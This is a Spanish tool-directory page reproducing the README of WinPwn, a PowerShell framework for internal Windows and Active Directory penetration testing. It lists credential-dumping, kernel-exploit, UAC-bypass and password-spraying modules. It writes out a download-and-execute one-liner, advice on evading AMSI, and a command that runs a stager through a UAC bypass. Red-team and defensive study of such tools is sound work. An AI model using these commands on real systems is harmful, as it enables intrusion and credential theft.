Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WinPwn — Automatización para Prueba de Penetración interna en Windows / Seguridad de AD | Kitploit
Herramientas/GitHubGitHub/s3cur3th1ssh1t/winpwn
Frameworks de Pruebas de PenetraciónEscalada de PrivilegiosReconocimientoExplotaciónPost-ExplotaciónPruebas de PenetraciónRed TeamingTop en Post-Explotación #17Top en Escalada de Privilegios #5
3.7k53512hace 1 añoRevisado por Kitploit
GitHub
s3cur3th1ssh1t/winpwn

WinPwn

Automatización para Prueba de Penetración interna en Windows / Seguridad de AD

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Patrocinado por

     

WinPwn

En muchas pruebas de penetración internas anteriores, a menudo tuve problemas con los scripts existentes de Reconocimiento/Explotación en Powershell debido a la falta de soporte de proxy. También solía ejecutar los mismos scripts uno tras otro para obtener información sobre el sistema actual y/o el dominio. Para automatizar tantos procesos de pruebas de penetración internas (reconocimiento y explotación) y por la razón del proxy, escribí mi propio script con reconocimiento e integración automática de proxy. El script se basa en gran medida en otros proyectos ofensivos de seguridad de Powershell conocidos.

¡Cualquier sugerencia, comentario, solicitud de extracción y comentario es bienvenida!

Simplemente importa los módulos con:

Import-Module .\WinPwn.ps1 o iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

Para evadir AMSI, toma una de las técnicas de evasión existentes, encuentra el de AMSI y cámbialo manualmente en la función de evasión o codifica la cadena desencadenante. Alternativamente, ofusca todo el script.

desencadenante

Si te encuentras atascado en un sistema Windows sin acceso a internet, no hay problema, simplemente usa Offline_Winpwn.ps1, los scripts y ejecutables más importantes están incluidos.

Funciones disponibles después de la importación:

  • WinPwn -> Menú para elegir ataques:

alt text

  • Inveigh -> Ejecuta Inveigh en una nueva ventana de Consola, ataques SMB-Relay con gestión de sesiones (Invoke-TheHash) integrados

  • SessionGopher -> Ejecuta Sessiongopher pidiéndote parámetros

  • Kittielocal ->

    • Versión ofuscada de Invoke-Mimikatz
    • Safetykatz en memoria
    • Volcado de lsass usando la técnica rundll32
    • Descargar y ejecutar Lazagne ofuscado
    • Volcado de credenciales del navegador
    • Versión personalizada de Mimikittenz
    • Exfiltrar credenciales Wi-Fi
    • Volcado de hashes NTLM del archivo SAM
    • SharpCloud
  • Localreconmodules ->

    • Recopilar software instalado, software vulnerable, recursos compartidos, información de red, grupos, privilegios y muchos más
    • Verificar vulnerabilidades típicas como SMB-Signing, LLMNR Poisoning, MITM6, WSUS sobre HTTP
    • Revisar los registros de eventos de Powershell en busca de credenciales u otra información sensible
    • Recopilar credenciales del navegador e historial
    • Buscar contraseñas en el registro y en el sistema de archivos
    • Encontrar archivos sensibles (archivos de configuración, archivos RDP, bases de datos de Keepass)
    • Buscar binarios .NET en el sistema local
    • Opcional: Get-Computerdetails (Powersploit) y PSRecon
  • Domainreconmodules ->

    • Recopilar diversas informaciones del dominio para revisión manual
    • Encontrar contraseñas de AD en campos de descripción
    • Buscar archivos potencialmente sensibles en recursos compartidos del dominio
    • Se enumeran sistemas/usuarios con delegación sin restricciones
    • Generar informe de Bloodhound
    • Escáner MS17-10 para sistemas del dominio
    • Escáner Bluekeep para sistemas del dominio
    • Descubrimiento de servidores SQL y funciones de auditoría - PowerUpSQL
    • Verificación MS-RPRN para controladores de dominio o todos los sistemas
    • Auditoría de directivas de grupo con Grouper2
    • Se genera un informe de AD en archivos CSV (o XLS si Excel está instalado) con ADRecon
    • Verificar impresoras en busca de vulnerabilidades comunes
    • Buscar rutas de ataque de delegación restringida basada en recursos
    • Verificar todos los DCs para zerologon - CVE-2020-1472
    • Y más, solo echa un vistazo
  • Privescmodules

    • Invoke-PrivescCheck de itm4n
    • winPEAS
    • Allchecks de PowerUp de Powersploit, Sherlock, GPPPasswords
    • Dll Hijacking, Permisos de archivos, Permisos de registro y claves débiles, Verificación de Rotten/Juicy Potato
  • kernelexploits ->

    • MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) ¡solo x86!
    • MS16-032 - (2008/7/8/10/2012)!
    • MS16-135 - (¡solo WS2k16)!
    • CVE-2018-8120 - Mayo 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
    • CVE-2019-0841 - Abril 2019!
    • CVE-2019-1069 - Polarbear Hardlink, se necesitan credenciales - Junio 2019!
    • CVE-2019-1129/1130 - Condición de carrera, se necesitan múltiples núcleos - Julio 2019!
    • CVE-2019-1215 - Septiembre 2019 - ¡solo x64!
    • CVE-2020-0638 - Febrero 2020 - ¡solo x64!
    • CVE-2020-0796 - SMBGhost
    • CVE-2020-0787 - Marzo 2020 - todas las versiones de Windows
    • CVE-2021-34527/CVE-2021-1675 - Junio 2021 - PrintNightmare
    • CVE-2021-40449 - CallbackHell - Octubre 2021
    • Exploit Juicy-Potato
    • Printspoofer de itm4n
  • UACBypass ->

    • UAC Magic, basado en la publicación de tres partes de James Forshaw sobre UAC
    • Técnica de evasión de UAC cmstp, por Oddvar Moe
    • Evasión de UAC DiskCleanup, por James Forshaw
    • Técnica DccwBypassUAC, por Ernesto Fernandez y Thomas Vanhoutte
  • SYSTEMShell ->

    • Abrir shell de sistema usando CreateProcess
    • Abrir shell de sistema usando suplantación de NamedPipe
    • Abrir shell de sistema usando manipulación de tokens
    • Vincular shell de sistema usando carga de DLL de UsoClient o CreateProcess
  • Shareenumeration -> Invoke-Filefinder e Invoke-Sharefinder (Powerview / Powersploit)

  • Domainshares -> Búsqueda de Snaffler o Passhunt en todos los sistemas del dominio

  • Groupsearch -> Get-DomainGPOUserLocalGroupMapping - encontrar sistemas donde tengas acceso de Administrador o acceso RDP a través de la asignación de directivas de grupo (Powerview / Powersploit)

  • Kerberoasting -> Ejecuta Invoke-Kerberoast en una nueva ventana y almacena los hashes para su posterior descifrado

  • PowerSQL -> Descubrimiento de servidores SQL, verificar acceso con el usuario actual, auditar credenciales predeterminadas + Ataques de inyección de ruta UNC

  • Sharphound -> Informe de Bloodhound 3.0

  • Adidnsmenu -> Crear o eliminar nodos DNS integrados en Active Directory

  • MS17-10 -> Escanear servidores Windows activos en el dominio o todos los sistemas en busca de la vulnerabilidad MS17-10 (Eternalblue)

  • Sharpcradle -> Cargar archivos C# desde un servidor web remoto a la RAM

  • DomainPassSpray -> Ataques de rociado de contraseñas de dominio, una contraseña para todos los usuarios del dominio

  • Bluekeep -> Escáner Bluekeep para sistemas del dominio

Sin parámetros, la mayoría de las funciones solo se pueden usar desde un shell interactivo. Así que decidí agregar los parámetros -noninteractive y -consoleoutput para que el script sea utilizable desde un marco de C2 asíncrono como Empire, Covenant, Cobalt Strike u otros. Además, se agregó el parámetro -repo para usar WinPwn con todas sus funciones desde un repositorio local. Se pueden usar de la siguiente manera:

Uso:

-noninteractive -> Sin preguntas para las funciones, para que se ejecuten con parámetros predefinidos o definidos por el usuario

-consoleoutput -> No se crean las carpetas de loot/informes. Cada función devuelve la salida a la consola para que puedas ver todo en los registros del Agente de tu marco de C2 Ejemplos:

WinPwn -noninteractive -consoleoutput -DomainRecon -> Esto ejecutará cada script de reconocimiento de dominio y probablemente te dará mucha salida

WinPwn -noninteractive -consoleoutput -Localrecon -> Esto enumerará la mayor cantidad de información posible para el sistema local

Generalrecon -noninteractive -> Ejecutar funciones básicas de reconocimiento local y almacenar la salida en las carpetas correspondientes

UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp -> Ejecutar un stager en un proceso de alta integridad desde una sesión con pocos privilegios

Kittielocal -noninteractive -consoleoutput -browsercredentials -> Volcar credenciales del navegador a través de Sharpweb devolviendo la salida a la consola

Kittielocal -noninteractive -browsercredentials -> Volcar hashes NTLM del archivo SAM y almacenar la salida en un archivo

WinPwn -PowerSharpPack -consoleoutput -noninteractive -> Ejecutar Seatbelt, PowerUp, Watson y más binarios C# en memoria

Dotnetsearch -consoleoutput -noninteractive -> Buscar en C:\Program Files\ y C:\Program Files (x86)\ ensamblados .NET

WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo -> Usar un servidor web local como repositorio sin conexión para usar WinPwn sin acceso a internet

Get_WinPwn_Repo.sh:

Uso: ./Get_WinPwn_Repo.sh {Opción}

Ejemplo: ./Get_WinPwn_Repo.sh --install

Opciones: --install Descargar el repositorio y colocarlo en ./WinPwn_Repo/ --remove Eliminar el repositorio ./WinPwn_Repo/ --reinstall Eliminar el repositorio y descargar uno nuevo en ./WinPwn_Repo/ --start-server Iniciar un servidor HTTP de Python en el puerto 8000 --help Mostrar esta ayuda

POR HACER

  • Algo de ofuscación
  • Más ofuscación
  • Soporte de proxy a través de PAC-File
  • Obtener los scripts desde mi propio repositorio de credenciales (https://github.com/S3cur3Th1sSh1t/Creds) para ser independiente de los cambios en los repositorios originales
  • Más funciones de Reconocimiento/Explotación
  • Agregar menú para un mejor manejo de las funciones
  • Evasión de AMSI
  • Bloquear ETW

CRÉDITOS

  • Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
  • Arvanaghi - SessionGopher
  • PowerShellMafia - Powersploit
  • Dionach - PassHunt
  • A-mIn3 - WINSpect
  • 411Hall - JAWS
  • sense-of-security - ADrecon
  • dafthack - DomainPasswordSpray
  • rasta-mouse - Sherlock, Amsi Bypass, PPID Spoof & BlockDLLs
  • AlessandroZ - LaZagne
  • samratashok - nishang
  • leechristensen - Random Repo, Spoolsample, other ps1 scripts
  • HarmJ0y - Many good Blogposts, Gists and Scripts, all Ghostpack binaries
  • NETSPI - PowerUpSQL
  • Cn33liz - p0wnedShell
  • rasta-mouse - AmsiScanBufferBypass
  • l0ss - Grouper2,Snaffler,Grouper3
  • dafthack - DomainPasswordSpray
  • enjoiz - PrivEsc
  • itm4n - Invoke-PrivescCheck & PrintSpoofer
  • James Forshaw - UACBypasses
  • Oddvar Moe - UACBypass
  • Carlos Polop - winPEAS
  • gentilkiwi - Mimikatz, Kekeo
  • hlldz - Invoke-Phantom
  • Matthew Graeber - many Ps1 Scripts which are nearly used everywhere
  • Steve Borosh - Misc-Powershell-Scripts, SharpPrinter, SharpSSDP
  • Sean Metcalf - SPN-Scan + many usefull articles @adsecurity.org
  • @l0ss and @Sh3r4 - Snaffler
  • FSecureLABS - GPO Tools
  • vletoux - PingCastle Scanners
  • NCCGroup + BC-Security - ZeroLogon Scanner
  • All people working on Bloodhound - SharpHound Collector
  • klezVirus - SharpLdapRelayScan
  • cube0x0 - LdapSignCheck + other toolings
  • @s4ntiago_p - NanoDump
  • @thefLinkk - Handlekatz
  • @Mayyhem - SharpSCCM
  • @cube0x0 - LdapSignCheck
  • @klezVirus - SharpLdapRelayScan
  • @HarmJ0y, @leechristensen, @CCob - Certify
  • @Yudasm - ShadowHound
  • Many more people in the Community - I'm sure, that I've forgotten many other invididuals who indirectly contributed into this Script

Estrellas a lo largo del tiempo

Estrellas a lo largo del tiempo

Aviso legal:

El uso de WinPwn para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables por cualquier mal uso o daño causado por este programa. Úselo solo con fines educativos.

Descargar herramienta